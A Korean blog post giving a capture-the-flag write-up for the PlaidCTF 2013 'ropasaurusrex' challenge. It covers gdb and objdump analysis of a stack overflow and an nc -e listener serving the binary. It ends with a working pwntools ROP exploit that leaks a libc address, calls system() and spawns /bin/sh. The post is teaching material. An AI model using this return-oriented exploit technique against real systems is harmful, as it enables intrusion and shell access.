'pwntools' 태그의 글 목록

pwntools

[pcf2013] ropasaurusrex 2016.05.11

[pcf2013] ropasaurusrex

2016. 5. 11. 16:50

https://github.com/isislab/CTF-Challenges/tree/master/pctf2013/pwnable/ropasaurusrex

1. disassemble

[asm]

.text:0804841D                               ; int __cdecl main(int, char **, char **)
.text:0804841D                               main            proc near               ; DATA XREF: start+17o
.text:0804841D 55                                            push    ebp
.text:0804841E 89 E5                                         mov     ebp, esp
.text:08048420 83 E4 F0                                      and     esp, 0FFFFFFF0h
.text:08048423 83 EC 10                                      sub     esp, 10h
.text:08048426 E8 C9 FF FF FF                                call    sub_80483F4
.text:0804842B C7 44 24 08 04 00 00 00                       mov     dword ptr [esp+8], 4 ; n
.text:08048433 C7 44 24 04 10 85 04 08                       mov     dword ptr [esp+4], offset aWin ; "WIN\n"
.text:0804843B C7 04 24 01 00 00 00                          mov     dword ptr [esp], 1 ; fd
.text:08048442 E8 C5 FE FF FF                                call    _write
.text:08048447 C9                                            leave
.text:08048448 C3                                            retn
.text:08048448                               main            endp

[psuedo]

int __cdecl main()
{
sub_80483F4();
return write(1, "WIN\n", 4u);
}

2. sub_80483F4()

[asm]

.text:080483F4                               sub_80483F4     proc near               ; CODE XREF: main+9p
.text:080483F4
.text:080483F4                               buf             = byte ptr -88h
.text:080483F4
.text:080483F4 55                                            push    ebp
.text:080483F5 89 E5                                         mov     ebp, esp
.text:080483F7 81 EC 98 00 00 00                             sub     esp, 98h
.text:080483FD C7 44 24 08 00 01 00 00                       mov     dword ptr [esp+8], 100h ; nbytes
.text:08048405 8D 85 78 FF FF FF                             lea     eax, [ebp+buf]
.text:0804840B 89 44 24 04                                   mov     [esp+4], eax    ; buf
.text:0804840F C7 04 24 00 00 00 00                          mov     dword ptr [esp], 0 ; fd
.text:08048416 E8 11 FF FF FF                                call    _read
.text:0804841B C9                                            leave
.text:0804841C C3                                            retn
.text:0804841C                               sub_80483F4     endp

[psuedo]

ssize_t sub_80483F4()
{
char buf; // [esp+10h] [ebp-88h]@1

return read(0, &buf, 0x100u);
}

3. command

[babyhack@localhost pcf2013]$ (python -c 'print "a"*138';cat) | ./vul
WIN

세그멘테이션 오류 (core dumped)
[babyhack@localhost pcf2013]$ (python -c 'print "a"*139';cat) | ./vul
WIN

세그멘테이션 오류 (core dumped)
[babyhack@localhost pcf2013]$ (python -c 'print "a"*140';cat) | ./vul

세그멘테이션 오류 (core dumped)
[babyhack@localhost pcf2013]$

4. 파일 속성 확인

http://www.trapkit.de/tools/checksec.html

babyhack@ubuntu:/tmp/pwnable/pctf2013/ropasaurusrex$ ../../checksec.sh --file vul
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
No RELRO No canary found NX enabled No PIE No RPATH No RUNPATH vul
babyhack@ubuntu:/tmp/pwnable/pctf2013/ropasaurusrex$

NX(No Excutable)가 활성화 되어 있습니다.

NX란 메모리 보호 기법 중 하나로, 메모리 페이지의 권한을 write권한과 execute권한을 동시에 갖지 않도록 설정하는 것이다. 예를 들어 지역변수에 입력을 받을 때 overflow가 발생하는 바이너리가 있다고 하자. 만약 NX가 활성화되어있지 않다면 지역변수 메모리에 쉘코드를 넣고 ret addr를 쉘코드를 가리키게 하여 쉘코드를 실행시키는 것이 가능하다. 하지만 NX가 활성화되어있다면 메모리에 execute 권한이 없으므로 쉘코드를 실행시킬 수 없다.

5. gdb 활용한 분석

disas main 하였을 때 아래와 같이 나올 경우

(gdb) disas main
No symbol table is loaded. Use the "file" command.

다음과 같이 file 정보를 확인 하고 .text 섹션을 분석합니다.

[babyhack@localhost pcf2013]$ gdb -q vul
Reading symbols from vul...(no debugging symbols found)...done.
(gdb) info file
Symbols from "/tmp/pwnable/pcf2013/vul".
Local exec file:
`/tmp/pwnable/pcf2013/vul', file type elf32-i386.
Entry point: 0x8048340
0x08048114 - 0x08048127 is .interp
0x08048128 - 0x08048148 is .note.ABI-tag
0x08048148 - 0x0804816c is .note.gnu.build-id
0x0804816c - 0x08048198 is .hash
0x08048198 - 0x080481b8 is .gnu.hash
0x080481b8 - 0x08048218 is .dynsym
0x08048218 - 0x08048268 is .dynstr
0x08048268 - 0x08048274 is .gnu.version
0x08048274 - 0x08048294 is .gnu.version_r
0x08048294 - 0x0804829c is .rel.dyn
0x0804829c - 0x080482bc is .rel.plt
0x080482bc - 0x080482ec is .init
0x080482ec - 0x0804833c is .plt
0x08048340 - 0x080484ec is .text
0x080484ec - 0x08048508 is .fini
0x08048508 - 0x08048515 is .rodata
..........................................

(gdb) disas 0x08048340, 0x080484ec
Dump of assembler code from 0x8048340 to 0x80484ec:
   0x08048340: xor    %ebp,%ebp
   0x08048342: pop    %esi
   0x08048343: mov    %esp,%ecx
   0x08048345: and    $0xfffffff0,%esp
   0x08048348: push   %eax
   0x08048349: push   %esp
   0x0804834a: push   %edx
   0x0804834b: push   $0x8048450
   0x08048350: push   $0x8048460
   0x08048355: push   %ecx
   0x08048356: push   %esi
   0x08048357: push   $0x804841d   <-- main 시작 주소
   0x0804835c: call   0x804831c <__libc_start_main@plt>
..........................

(gdb) disas 0x0804841d, 0x0806841d
Dump of assembler code from 0x804841d to 0x806841d:
   0x0804841d: push   %ebp
   0x0804841e: mov    %esp,%ebp
   0x08048420: and    $0xfffffff0,%esp
   0x08048423: sub    $0x10,%esp
   0x08048426: call   0x80483f4
   0x0804842b: movl   $0x4,0x8(%esp)
   0x08048433: movl   $0x8048510,0x4(%esp)    <- "WIN" 문자열 있는 주소
   0x0804843b: movl   $0x1,(%esp)
   0x08048442: call   0x804830c <write@plt>
   0x08048447: leave
   0x08048448: ret
   0x08048449: nop
   0x0804844a: nop

.......................

(gdb) x/s 0x08048510
0x8048510: "WIN\n"
(gdb)

main 코드를 찾았습니다. ida를 통하여 확인한 내용과 동일 함을 알 수 있습니다.

(gdb) disas 0x80483f4, 0x80583f4
Dump of assembler code from 0x80483f4 to 0x80583f4:
   0x080483f4: push   %ebp
   0x080483f5: mov    %esp,%ebp
   0x080483f7: sub    $0x98,%esp                <-- REP 위치 크기
   0x080483fd: movl   $0x100,0x8(%esp)
   0x08048405: lea    -0x88(%ebp),%eax     <-- stack 크기
   0x0804840b: mov    %eax,0x4(%esp)
   0x0804840f: movl   $0x0,(%esp)
   0x08048416: call   0x804832c <read@plt>
   0x0804841b: leave
   0x0804841c: ret
.................

메모리 구조

[buff - 0x88(136 byte)] + [ebp - 0x04(4 byte)] + [eip - 0x4(4 byte)]

5. Register 확인

(gdb) info reg
eax            0xbffff040 -1073745856
ecx            0xbf612fd7 -1084149801
edx            0xbffff114 -1073745644
ebx            0x0 0
esp            0xbffff030 0xbffff030
ebp            0xbffff0c8 0xbffff0c8
esi            0x1 1
edi            0xb7fc0000 -1208221696
eip            0x804840b 0x804840b
eflags         0x286 [ PF SF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51

[bof 검증 진행]

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaccccdddd

a * [136] -- stack

c * [4] -- ebp

d * [4] -- eip

0x64646464 in ?? ()
(gdb) info reg
eax            0x95 149
ecx            0xbffff040 -1073745856
edx            0x100 256
ebx            0x0 0
esp            0xbffff0d0 0xbffff0d0
ebp            0x63636363 0x63636363
esi            0x1 1
edi            0xb7fc0000 -1208221696
eip            0x64646464 0x64646464
eflags         0x10203 [ CF IF RF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51

(gdb) b *0x0804841b
Breakpoint 1 at 0x804841b
(gdb) r
Starting program: /tmp/pwnable/pcf2013/vul
Missing separate debuginfos, use: dnf debuginfo-install glibc-2.22-3.fc23.i686
aaaaaaaaaaa

Breakpoint 1, 0x0804841b in ?? ()
(gdb) info reg
eax            0xc 12
ecx            0xbffff040 -1073745856
edx            0x100 256
ebx            0x0 0
esp            0xbffff030 0xbffff030
ebp            0xbffff0c8 0xbffff0c8
esi            0x1 1
edi            0xb7fc0000 -1208221696
eip            0x804841b 0x804841b
eflags         0x203 [ CF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51
(gdb) x/80wx $esp
0xbffff030: 0x00000000 0xbffff040 0x00000100 0x00000001
0xbffff040: 0x61616161 0x61616161 0x0a616161 0xb7fff8f8

--------------

buff 시작
0xbffff050: 0x00000000 0x00000009 0x000000c2 0x02c0003f
0xbffff060: 0x00000000 0x00f0b0ff 0xbffff09a 0x00000000
0xbffff070: 0xb7ffefc4 0xb7fff8f8 0xbffff01d 0x08048246

----------- --------------

esp eip
0xbffff080: 0xb7fd93d0 0xbffff124 0x00000001 0xb7eef277
0xbffff090: 0xffffffff 0x0000002f 0xb7e03ce4 0xb7fd93d0
0xbffff0a0: 0x00008000 0x08049604 0xbffff0b8 0x080482e8
0xbffff0b0: 0x00000001 0x08049604 0xbffff0e8 0x08048479
0xbffff0c0: 0x00000001 0xb7fc0000 0xbffff0e8 0x0804842b
0xbffff0d0: 0xb7fc03dc 0xb7fff8f8 0x0804846b 0x00000000
0xbffff0e0: 0x00000001 0xb7fc0000 0x00000000 0xb7e0f545
0xbffff0f0: 0x00000001 0xbffff184 0xbffff18c 0x00000000
0xbffff100: 0x00000000 0x00000000 0xb7fc0000 0xb7fffbe4
0xbffff110: 0x08048218 0x00000000 0x00000001 0xb7fc0000
0xbffff120: 0x00000000 0xccb09826 0xf2bb7236 0x00000000
0xbffff130: 0x00000000 0x00000000 0x00000001 0x08048340
0xbffff140: 0x00000000 0xb7ff2910 0xb7fec920 0xb7ffefc4
0xbffff150: 0x00000001 0x08048340 0x00000000 0x08048361
0xbffff160: 0x0804841d 0x00000001 0xbffff184 0x08048460
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/pwnable/pcf2013/vul
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Breakpoint 1, 0x0804841b in ?? ()
(gdb) x/80wx $esp
0xbffff030: 0x00000000 0xbffff040 0x00000100 0x00000001
0xbffff040: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff050: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff060: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff070: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff080: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff090: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff0a0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff0b0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff0c0: 0x61616161 0xb7fc000a 0xbffff0e8 0x0804842b
----------- --------------

ebp ret

0xbffff0d0: 0xb7fc03dc 0xb7fff8f8 0x0804846b 0x00000000
0xbffff0e0: 0x00000001 0xb7fc0000 0x00000000 0xb7e0f545
0xbffff0f0: 0x00000001 0xbffff184 0xbffff18c 0x00000000
0xbffff100: 0x00000000 0x00000000 0xb7fc0000 0xb7fffbe4
0xbffff110: 0x08048218 0x00000000 0x00000001 0xb7fc0000
0xbffff120: 0x00000000 0x043625c7 0x3a3dcfd7 0x00000000
0xbffff130: 0x00000000 0x00000000 0x00000001 0x08048340
0xbffff140: 0x00000000 0xb7ff2910 0xb7fec920 0xb7ffefc4
0xbffff150: 0x00000001 0x08048340 0x00000000 0x08048361
0xbffff160: 0x0804841d 0x00000001 0xbffff184 0x08048460
(gdb) info reg
eax            0x85 133   <-- 입력한 문자 수
ecx            0xbffff040 -1073745856
edx            0x100 256
ebx            0x0 0
esp            0xbffff030 0xbffff030
ebp            0xbffff0c8 0xbffff0c8
esi            0x1 1
edi            0xb7fc0000 -1208221696
eip            0x804841b 0x804841b
eflags         0x207 [ CF PF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/pwnable/pcf2013/vul
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc

------------- -------------

                                                    ebp          ret
0xbffff0d0: 0xb7fc03dc 0xb7fff8f8 0x0804846b 0x00000000
0xbffff0e0: 0x00000001 0xb7fc0000 0x00000000 0xb7e0f545
0xbffff0f0: 0x00000001 0xbffff184 0xbffff18c 0x00000000
0xbffff100: 0x00000000 0x00000000 0xb7fc0000 0xb7fffbe4
0xbffff110: 0x08048218 0x00000000 0x00000001 0xb7fc0000
0xbffff120: 0x00000000 0x1bba14b9 0x25b1fea9 0x00000000
0xbffff130: 0x00000000 0x00000000 0x00000001 0x08048340
0xbffff140: 0x00000000 0xb7ff2910 0xb7fec920 0xb7ffefc4
0xbffff150: 0x00000001 0x08048340 0x00000000 0x08048361
0xbffff160: 0x0804841d 0x00000001 0xbffff184 0x08048460
(gdb) info reg
eax            0x8d 141
ecx            0xbffff040 -1073745856
edx            0x100 256
ebx            0x0 0
esp            0xbffff030 0xbffff030
ebp            0xbffff0c8 0xbffff0c8
esi            0x1 1
edi            0xb7fc0000 -1208221696
eip            0x804841b 0x804841b
eflags         0x203 [ CF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51

(gdb) x/s $ebp
0xbffff0c8: "cccc\n\204\004\b\334\003\374\267\370\370\377\267k\204\004\b"

(gdb) b *0x0804842b
Breakpoint 1 at 0x804842b
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/pwnable/pcf2013/vul
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

(gdb) info reg
eax            0x91 145
ecx            0xbffff040 -1073745856
edx            0x100 256
ebx            0x0 0
esp            0xbffff0d0 0xbffff0d0
ebp            0x63636363 0x63636363
esi            0x1 1
edi            0xb7fc0000 -1208221696
eip            0x41414141 0x41414141
eflags         0x10207 [ CF PF IF RF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51
(gdb)

이젠 공격 버퍼를 만들 수 있습니다.

[pwntools - install]

1. apt-get install python, python-dev, python-pip

2. apt-get url add

- vi /etc/apt/sources.list

- "deb http://us.archive.ubuntu.com/ubuntu vivid main universe"

3. apt-get install libcapstone-dev (python2.7-dev 설치시 따로 설치 안해 됨.)

4. pip install pwntools

문제 서버로 돌리기

※ nc-openbsd의 경우 -e 기능이 없으므로, traditional 버전을 설치 해야 합니다.

-->> $ sudo apt-get install netcat-traditional

--> apt-get install netcat-traditional

$ while true; do nc -vv -l -p 1234 -e ./vul; done
listening on [any] 1234 ...

이제 exploit을 만들어 봅시다. overflow 발생한 지점을 확인 하였기 때문에

exploit을 짜면 됩니다. exploit을 짜기 위해서는 우선 구성을 해야 합니다.

1. 호출 할 명령어 작성("sh", "cat /etc/passwd", "cat flag", etc)

2. 명령어 실행 시킬 방법 구상 ("system", "exec", "execl", "execv", etc)

우리는 우선 명령어를 쓸 메모리를 찾아 봐야합니다.

찾기 위해서는 objdump 명령어를 활용하여 메모리 속성과 크기를 확인 하는 것이 좋습니다.

objdump -x vul

vul: file format elf32-i386
vul
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x08048340

Program Header:
    PHDR off    0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2
         filesz 0x000000e0 memsz 0x000000e0 flags r-x
INTERP off    0x00000114 vaddr 0x08048114 paddr 0x08048114 align 2**0
         filesz 0x00000013 memsz 0x00000013 flags r--
    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
         filesz 0x0000051c memsz 0x0000051c flags r-x
    LOAD off    0x0000051c vaddr 0x0804951c paddr 0x0804951c align 2**12
         filesz 0x0000010c memsz 0x00000114 flags rw-
DYNAMIC off    0x00000530 vaddr 0x08049530 paddr 0x08049530 align 2**2
         filesz 0x000000d0 memsz 0x000000d0 flags rw-
    NOTE off    0x00000128 vaddr 0x08048128 paddr 0x08048128 align 2**2
         filesz 0x00000044 memsz 0x00000044 flags r--
   STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2
         filesz 0x00000000 memsz 0x00000000 flags rw-

Dynamic Section:
NEEDED               libc.so.6
INIT                 0x080482bc
FINI                 0x080484ec
HASH                 0x0804816c
GNU_HASH             0x08048198
STRTAB               0x08048218
SYMTAB               0x080481b8
STRSZ                0x00000050
SYMENT               0x00000010
DEBUG                0x00000000
PLTGOT               0x08049604
PLTRELSZ             0x00000020
PLTREL               0x00000011
JMPREL               0x0804829c
REL                  0x08048294
RELSZ                0x00000008
RELENT               0x00000008
VERNEED              0x08048274
VERNEEDNUM           0x00000001
VERSYM               0x08048268

Version References:
required from libc.so.6:
0x0d696910 0x00 02 GLIBC_2.0

Sections:
Idx Name          Size      VMA       LMA       File off Algn
0 .interp       00000013 08048114 08048114 00000114 2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
1 .note.ABI-tag 00000020 08048128 08048128 00000128 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
2 .note.gnu.build-id 00000024 08048148 08048148 00000148 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
3 .hash         0000002c 0804816c 0804816c 0000016c 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
4 .gnu.hash     00000020 08048198 08048198 00000198 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
5 .dynsym       00000060 080481b8 080481b8 000001b8 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
6 .dynstr       00000050 08048218 08048218 00000218 2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
7 .gnu.version 0000000c 08048268 08048268 00000268 2**1
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
8 .gnu.version_r 00000020 08048274 08048274 00000274 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
9 .rel.dyn      00000008 08048294 08048294 00000294 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
10 .rel.plt      00000020 0804829c 0804829c 0000029c 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
11 .init         00000030 080482bc 080482bc 000002bc 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
12 .plt          00000050 080482ec 080482ec 000002ec 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
13 .text         000001ac 08048340 08048340 00000340 2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
14 .fini         0000001c 080484ec 080484ec 000004ec 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
15 .rodata       0000000d 08048508 08048508 00000508 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
16 .eh_frame     00000004 08048518 08048518 00000518 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
17 .ctors        00000008 0804951c 0804951c 0000051c 2**2
                  CONTENTS, ALLOC, LOAD, DATA
18 .dtors        00000008 08049524 08049524 00000524 2**2
                  CONTENTS, ALLOC, LOAD, DATA
19 .jcr          00000004 0804952c 0804952c 0000052c 2**2
                  CONTENTS, ALLOC, LOAD, DATA
20 .dynamic      000000d0 08049530 08049530 00000530 2**2
                  CONTENTS, ALLOC, LOAD, DATA
21 .got          00000004 08049600 08049600 00000600 2**2
                  CONTENTS, ALLOC, LOAD, DATA
22 .got.plt      0000001c 08049604 08049604 00000604 2**2
                  CONTENTS, ALLOC, LOAD, DATA
23 .data         00000008 08049620 08049620 00000620 2**2
                  CONTENTS, ALLOC, LOAD, DATA
24 .bss          00000008 08049628 08049628 00000628 2**2
                  ALLOC
25 .comment      0000001c 00000000 00000000 00000628 2**0
                  CONTENTS, READONLY
SYMBOL TABLE:
no symbols

필요한 섹션만 선택 적으로 보기로 하겠습니다.

우선 data, dynamic, 등 data 섹션을 중심으로 보겠습니다.

그 이유는 data 섹션은 쓰기, 읽기 권한이 있기 때문에 명령어를 저장하는데 효과적이기 때문입니다.

babyhack@ubuntu:/tmp/pwnable/pctf2013/ropasaurusrex$ objdump -x vul | grep -A1 '\.data'
23 .data 00000008 08049620 08049620 00000620 2**2
CONTENTS, ALLOC, LOAD, DATA
babyhack@ubuntu:/tmp/pwnable/pctf2013/ropasaurusrex$

.data 섹션은 8byte로 작은 사이즈를 가지고 있습니다.

사이즈가 어느정도 확보하고 있는 곳을 찾아 해당 섹션에 명령어를 작성하기로 하겠습니다.

그래서 선택한 섹션은 .dynamic 섹션입니다.

babyhack@ubuntu:/tmp/pwnable/pctf2013/ropasaurusrex$ objdump -x vul | grep -A1 '\.dynamic'
20 .dynamic 000000d0 08049530 08049530 00000530 2**2
CONTENTS, ALLOC, LOAD, DATA
babyhack@ubuntu:/tmp/pwnable/pctf2013/ropasaurusrex$

.dynamic 섹션은 0xd0(208byte)를 가지고 있기 때문에 충분히 명령어를 작성할 수 있습니다.

이제 명령어를 쓸 수 있는 공간을 확보 하였기 때문에 이제는 호출할 시스템 함수를 찾아 봐야합니다.

코드상에서 문자를 쓰기 위해서는 write(), settext(), etc 등을 활용합니다.

ROP이기 때문에 현재 사용되고 있는 함수의 목록을 추출하여 분석을 진행 해야 합니다.

objdump -R vul

vul: file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049600 R_386_GLOB_DAT    __gmon_start__
08049610 R_386_JUMP_SLOT   __gmon_start__
08049614 R_386_JUMP_SLOT   write
08049618 R_386_JUMP_SLOT   __libc_start_main
0804961c R_386_JUMP_SLOT   read

objdump -T /lib/i686/cmov/libc.so.6 | grep system
000f5470 g    DF .text 00000042 GLIBC_2.0   svcerr_systemerr
00039450 g    DF .text 0000007d GLIBC_PRIVATE __libc_system
00039450 w   DF .text 0000007d GLIBC_2.0   system

이젠 가젯을 찾아야 합니다.

따라서, 가젯을 찾아 주는 프로그램을 구해야 합니다.

rp++ : https://github.com/0vercl0k/rp (※ Linux, windows, iOS 선택적으로 받으세요.)

./rp++ -f ./vul -r 4 | grep "pop"
0x080483c1: add al, 0x5B ; pop ebp ; ret ; (1 found)
0x080484e6: add al, 0x5B ; pop ebp ; ret ; (1 found)
0x080482e6: add byte [eax], al ; pop eax ; pop ebx ; leave ; ret ; (1 found)
0x080484de: add eax, dword [ebx-0x0B8A0008] ; add esp, 0x04 ; pop ebx ; pop ebp ; ret ; (1 found)
0x080483bf: add esp, 0x04 ; pop ebx ; pop ebp ; ret ; (1 found)
0x080484e4: add esp, 0x04 ; pop ebx ; pop ebp ; ret ; (1 found)
0x080484b1: fiadd word [ebx+0x5E5B1CC4] ; pop edi ; pop ebp ; ret ; (1 found)
0x080484e3: hlt ; add esp, 0x04 ; pop ebx ; pop ebp ; ret ; (1 found)
0x080483c0: les eax, [ebx+ebx*2] ; pop ebp ; ret ; (1 found)
0x080484e5: les eax, [ebx+ebx*2] ; pop ebp ; ret ; (1 found)
0x080484b3: les ebx, [ebx+ebx*2] ; pop esi ; pop edi ; pop ebp ; ret ; (1 found)
0x080483b8: mov byte [0x08049628], 0x00000001 ; add esp, 0x04 ; pop ebx ; pop ebp ; ret ; (1 found)
0x08048451: mov ebp, esp ; pop ebp ; ret ; (1 found)
0x0804844f: nop ; push ebp ; mov ebp, esp ; pop ebp ; ret ; (1 found)
0x080483bd: or byte [ecx], al ; add esp, 0x04 ; pop ebx ; pop ebp ; ret ; (1 found)
0x080482e8: pop eax ; pop ebx ; leave ; ret ; (1 found)
0x080483c3: pop ebp ; ret ; (1 found)
0x08048453: pop ebp ; ret ; (1 found)
0x080484b8: pop ebp ; ret ; (1 found)
0x080484e8: pop ebp ; ret ; (1 found)
0x080482e9: pop ebx ; leave ; ret ; (1 found)
0x08048505: pop ebx ; leave ; ret ; (1 found)
0x080483c2: pop ebx ; pop ebp ; ret ; (1 found)
0x080484e7: pop ebx ; pop ebp ; ret ; (1 found)
0x080484b5: pop ebx ; pop esi ; pop edi ; pop ebp ; ret ; (1 found)
0x08048504: pop ecx ; pop ebx ; leave ; ret ; (1 found)
0x080484b7: pop edi ; pop ebp ; ret ; (1 found)
0x080484b6: pop esi ; pop edi ; pop ebp ; ret ; (1 found)
0x080484e1: push dword [ebp-0x0C] ; add esp, 0x04 ; pop ebx ; pop ebp ; ret ; (1 found)
0x08048450: push ebp ; mov ebp, esp ; pop ebp ; ret ; (1 found)
0x080484b4: sbb al, 0x5B ; pop esi ; pop edi ; pop ebp ; ret ; (1 found)
0x080483ba: sub byte [esi-0x7CFEF7FC], dl ; les eax, [ebx+ebx*2] ; pop ebp ; ret ; (1 found)

가젯을 찾지 않고 편하게 사용하기 위해서는 pwn 패키지를 활용하면 됩니다.

사용법은 다음과 같습니다.

from pwn import *
from struct import *

binsh = "/bin/sh"
# up= lambda x:struct.unpack("<L",x) # L unsigned long integer 4 (3)
# little endian format exchange unsgined long type to binary string
up32 = lambda x:struct.unpack('<L',x)[0]

binary = ELF("vul")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
rop = ROP(binary)

print binary.checksec()

read_plt = binary.plt['read']
read_got = binary.got['read']
write_plt = binary.plt['write']
write_got = binary.got['write']

read_system_offset = libc.symbols['read'] - libc.symbols['system']
dynamic_section = 0x08049530

log.info("read@plt : " + str(hex(read_plt)))
log.info("read@got : " + str(hex(read_got)))
log.info("write@plt : " + str(hex(write_plt)))
log.info("write@got : " + str(hex(write_got)))
log.info("read system offset : " + str(hex(read_system_offset)))
log.info("Dynamic section : " + str(hex(dynamic_section)))

rop.read(0,dynamic_section,len(str(binsh)))    # 1
rop.write(1,read_got,len(str(read_got)))         # 2
rop.read(0,read_got,len(str(read_got)))         # 3
rop.raw(read_plt)                                    # 4  system 함수 호출
rop.raw(0xaaaabbbb)                              # 5   dummy
rop.raw(dynamic_section)                         # 6 "/bin/sh" 입력

payload = "A"*140 + str(rop)
print payload

#r = remote("127.0.0.1", 1234)
r = process('./vul')

r.send(payload) # overflow # 0
r.recvn(4,timeout=1)

r.send(binsh) # 1 code 실행
read = up32(r.recvn(4,timeout=1)) # 2 code 실행 / read_got 주소를 recv

log.info('read address : [%s]' % str(hex(read)))

system_addr = read - read_system_offset # 시스템 함수 주소 계산

log.info('system_addr : [%s]' % str(hex(system_addr)))

rop = ROP(binary)
rop.raw(system_addr)

r.send(str(rop)) # 3 code 실행 / system 함수를 write
r.interactive()

'''
[*] Loaded cached gadgets for 'vul' @ 0x8048000
RELRO:         No RELRO
Stack Canary: No canary found
NX:            NX enabled
PIE:           No PIE
RPATH:         No RPATH
RUNPATH:       No RUNPATH
[*] read@plt : 0x804832c
[*] read@got : 0x804961c
[*] write@plt : 0x804830c
[*] write@got : 0x8049614
[*] read system offset : 0x9e5b0
[*] Dynamic section : 0x8049530
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,\x83\x0\xbf\x83\x0\x00\x00\x00\x000\x95\x0\x07\x00\x00\x00\x0c\x83\x0\xbf\x83\x0\x00\x00\x00\x1c\x96\x0 \x00\x00\x00,\x83\x0\xbf\x83\x0\x00\x00\x00\x00\x1c\x96\x0 \x00\x00\x00,\x83\x0\xbb\xbb\xaa\xaa0\x95\x0
[+] Started program './vul'
[*]
[*] read address : [0xb75f2710]
[*] system_addr : [0xb7554160]
----> 0x0000: 0xb7554160
[*] Switching to interactive mode
'''

저작자표시 비영리 변경금지

'Reverse > pwnable' 카테고리의 다른 글

[vagrant] CGC (Cyber Grand Challenge) 환경 구축 (0)	2016.08.02
[pwntools] test code (0)	2016.07.27
[pwntools] 함수 offset 계산 방법 (0)	2016.07.21
[defcon 24 - 2016] Reversing - baby-re (0)	2016.05.24
[defcon 23 - 2015] r0pbaby Writeup (0)	2016.05.18

PREV 이전 1 NEXT 다음

앞만 보고 가는거야!!!

pwntools

[pcf2013] ropasaurusrex

'Reverse > pwnable' 카테고리의 다른 글

+ Recent posts

티스토리툴바